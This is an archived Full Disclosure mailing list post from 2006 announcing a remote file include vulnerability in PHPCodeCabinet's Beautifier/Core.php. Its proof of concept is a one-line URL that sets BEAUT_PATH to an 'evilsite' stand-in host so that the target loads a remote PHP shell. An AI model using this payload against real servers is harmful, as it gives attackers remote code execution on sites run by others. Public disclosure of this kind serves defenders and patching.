Full Disclosure mailing list archives

Previous By Date Next
Previous By Thread Next

PHPCodeCabinet Vulnerability

From: Minion <minionqb () gmail com>
Date: Fri, 4 Aug 2006 17:22:12 -0600
From Minion:


PHPCodeCabinet (all versions) is vulnerable to a remote file include.

The vulnerable code is in /include/Beautifier/Core.php

an $BEAUT_PATH Was not properly scrubbed, so they got owned.

Proof of concept:

*target phpcodecabinet
directory*/include/Beautifier/Core.php?BEAUT_PATH=*evilsite*/Beautifier/HFile.php

HFile.php would be your php shell.

Shouts to XoRcrew & Disruptiv.

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Previous By Date Next
Previous By Thread Next

Current thread: